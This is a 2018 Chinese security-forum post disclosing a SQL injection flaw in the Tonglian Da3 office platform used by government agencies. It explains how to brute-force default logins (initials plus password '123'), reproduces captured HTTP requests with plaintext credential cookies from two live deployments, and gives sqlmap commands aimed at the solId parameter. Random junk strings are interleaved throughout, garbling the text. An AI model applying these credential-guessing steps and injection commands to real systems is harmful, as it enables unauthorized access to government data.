找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1357|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 y7 |5 u* ?' P! ~: Q& \3 Z' ~
1 G6 O' R* \, i2 h s5 R

5 [2 P% D# g2 ]) W& ~# L* F

# T; Q. Y5 V. a# m 平台简介: ; p4 X5 S. c2 V8 F" ?/ q4 l( B

: B. n, F) v5 ]) K1 |( ~

0 J% v5 O4 n% @   3 s6 g; I0 P( b1 }9 U

6 ^0 z! A) U, _

9 B4 ~4 E# h3 I" j1 ^( e 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! H. C9 P E* M+ o0 _8 e 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( y: P* C+ T d) k5 g同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 _$ ^) w/ L. C3 h( b; Q

8 w: M0 ~, a, M. s/ v: [3 y

. a5 t8 J/ f0 b* i2 p  ) X8 t7 b' k8 u8 u

* v; u; ^" q& c1 t5 a

" o ^! v% O2 W! M+ p" M% C 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 9 ?* @# D, g/ R/ Y3 E* ~, U

8 M8 ^" ?3 r- E- {- c

3 B% }* J2 h: T+ v4 w8 r m  / Q1 t. A' o4 Q& q: @. l% `9 b& C2 Z

# K7 q, s7 [" h3 f, T% B

0 S: h# A3 I+ V* t6 i( ?0 b http://1.1.1.1:7197/cap-aco/#(案例2-)7 V9 U7 ^# ^. i l

; N! Q# E" M) N+ l

: Z7 j7 D' W" X http://www.XXOO.com (案例1-官网网站)7 g2 S, C; d d& r5 ~

/ A) K" {' T, q R3 C" |

( E5 Q$ q" D0 ~7 t   2 {* w& V- M% k; H7 U9 m

/ _2 z9 ?3 e3 Q) j

: j- n' D5 ]! E5 U. U4 t5 ~5 e" d 漏洞详情: 9 V5 C& G+ K3 \

6 M7 {9 a E- M& c9 w* i- e& |

2 K% H2 z5 ^8 V2 Y8 m# O3 T  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试% Q; m. y9 r" Y& |, x

. u( ~) b# _& p+ V7 _) F

. Z( j; F7 C6 [" O" r0 |& Q/ r" m      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: $ Y6 l, Q9 ^% W+ q# G

5 r+ ^0 h9 F7 X7 L# w% ]

3 I; k2 e3 i T1 Q% x, d0 w   3 ]& }0 ~4 @1 _

" o# @/ _/ F, B+ B4 w8 }

$ {! D) Q1 U# w0 U" @+ z! ^' W- C' i   ) Z- _3 G H- m& E/ t: D

. W; b8 |2 n c u8 k

+ j. p! n& E; |; I status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 3 S8 R; l6 v/ O# e# b+ m0 a6 N7 u

5 }8 y8 l# {, r8 T

& T0 X* w) H& O4 s8 x8 H 1、案例1-官方网站 : k. m7 Q2 Q" b* k' h

" p9 z% b$ i9 C! p& ~/ D Z

8 v) n8 i J. [* Y" y GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 1 V0 Z; G# ^/ v! Q0 a7 v+ m, D

8 P* F9 L* u8 z) A5 ~, P/ ]

* a/ Y* N7 U/ B R/ l" s Host: www.XXOO.com3 Z! o( E* j# E- g4 n) {

, i, J1 u0 {7 ?0 u2 G, p, u

( `7 e7 C" D4 G6 K Proxy-Connection: Keep-Alive4 g. \, @4 `! V9 ]% B/ p: t

; R2 l" ]# q9 g* b/ a3 x- w

) g) h3 |" }- ]% h' z Accept: application/json, text/javascript, */*; q=0.01 4 `+ R+ Z' L2 G0 B8 O

( U7 x" K& ~, u0 u4 Z

# \0 F+ C* H# { Accept-Language: zh-CN5 C( s2 K- o2 O

5 x0 k+ i, i5 m7 o1 y# U" V. j

6 L" x+ Z+ s5 } Content-Type: application/json* O ]7 W9 e& \, s

, q" f% `% P# g$ [: p0 [

2 M1 e5 R8 F. b( } User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 5 q$ j: E: |8 C7 o

; M& l8 O" c8 g4 p( w$ P

8 A0 H* [3 {8 f3 M, m p: k X-Requested-With: XMLHttpRequest $ z6 g% J- Z5 I) c9 |% L+ X2 |- D

/ |' `7 c* J9 f0 C( g

) |& d8 @9 e6 ^4 Y3 ? V. } Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002- t6 ~( m- a! U4 S% i! `/ G- p! a2 o* n

; I$ \. M$ Q3 M

0 R9 R @' E% o6 R; d' _- I; t/ h Accept-Encoding: gzip, deflate, sdch& X" L1 j' M! b4 _7 ?

$ s$ d8 E: C: y8 L6 Z% N& T+ q

5 ^) M8 ]0 V+ S6 ] Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 1 ~4 Q# h- B ?9 {

8 D/ K) g5 {7 E5 | h! K0 `$ u% ?% q

+ x, n1 h- f$ a6 @. E7 {" L 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:& W0 t |) H' E' E( w0 c& V# x; s5 Z

- O8 E4 E% H9 }, _$ p

8 r: e- Q6 n8 _: W' p   ! V/ S" P3 @8 | {& l

0 H1 F* m$ P* t

" X* f" Q0 T6 J3 z4 J3 Z   ; H# `# A* ]8 y6 g9 h

7 I5 G# k2 A' g5 ~* M$ F* o

2 L, N& q. w- L' |0 L, \9 [  4 H5 y3 x/ Q9 P2 @

: \* m8 R* V; g P- z: l3 d! r2 n

9 P. G* u( D# E  1 ~1 t$ T9 w6 C! s2 C* a

w9 v" e( a. J2 z( |# X) K

6 f# N- I$ g7 T2 |$ t8 @  3 y# A5 H% C3 f7 S

2 ~& A1 L! o `. t: O

* p/ H) r$ Z p+ E 2、案例2-某天河云平台 $ i6 ]7 m' \ \/ S. O) l8 q+ `' B

: x& q( W$ z' {0 _

0 A4 H: u" a3 Y' M1 V/ E+ y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 , G7 }& o. s Q# E$ Q

3 h# G7 U2 o0 ~; [

* y/ M1 F1 Z. O7 [- ]% N) q Host: 1.1.1.:7197 9 D, m- ]5 i; o' W! z- B

- o, r2 X4 h5 Z5 m- n

S4 G% F3 @4 ] Accept: application/json, text/javascript, */*; q=0.01 1 \! d0 A. h P0 [

0 h( G% z' A% r- N: \7 t" l2 G

. y5 p- \$ A! B! A X-Requested-With: XMLHttpRequest 7 E* {% o% _7 e& [/ w, T

; B5 y7 V1 l7 V( B/ O

' H0 C, X7 U) N4 o; h( l User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 % Z1 M/ W1 \) r% f! \7 f6 l5 x

0 g5 p# n) F, d

0 q8 J1 R; o. p% l2 I& N* n, F Content-Type: application/json+ l- {3 q% h Y- n$ t- D5 M

! Y8 ]/ F8 H: H4 C

3 M/ k2 D1 e$ @8 Q2 P& O. f Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 # ^+ \7 L* v, E; [

, c) p; |9 C# e: J, r: @3 W. c0 H- g, m

( O/ n9 ?; x& U* X) M. K Accept-Language: zh-CN,zh;q=0.87 ?) v3 ?( P/ _( g! u

4 I, j- l* W F* u7 S) o; u# x

4 P4 \' w$ i5 v8 G+ A/ @ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 + v( d+ i/ [# X' g1 H. W6 m1 o, S

6 D0 Y+ L' u4 a$ P" }

! p: ]* U' I* x7 I Connection: close : g; @) h+ U# ]4 o. }( B

& o+ \9 ?, r4 N) U' u: Y

( R, k' T1 b9 a @5 |' J 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ z2 D" T/ m) K0 g

) D$ U }2 [3 y4 U

9 A- T" O* Y9 v+ G( Q   2 a. i* I; K/ A6 \9 k8 h. e

; v5 d( M9 G2 }: q9 o6 x1 V& y- d! S

6 @' e+ x2 j3 V/ M6 e
' v$ P5 S# N* X( e# u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表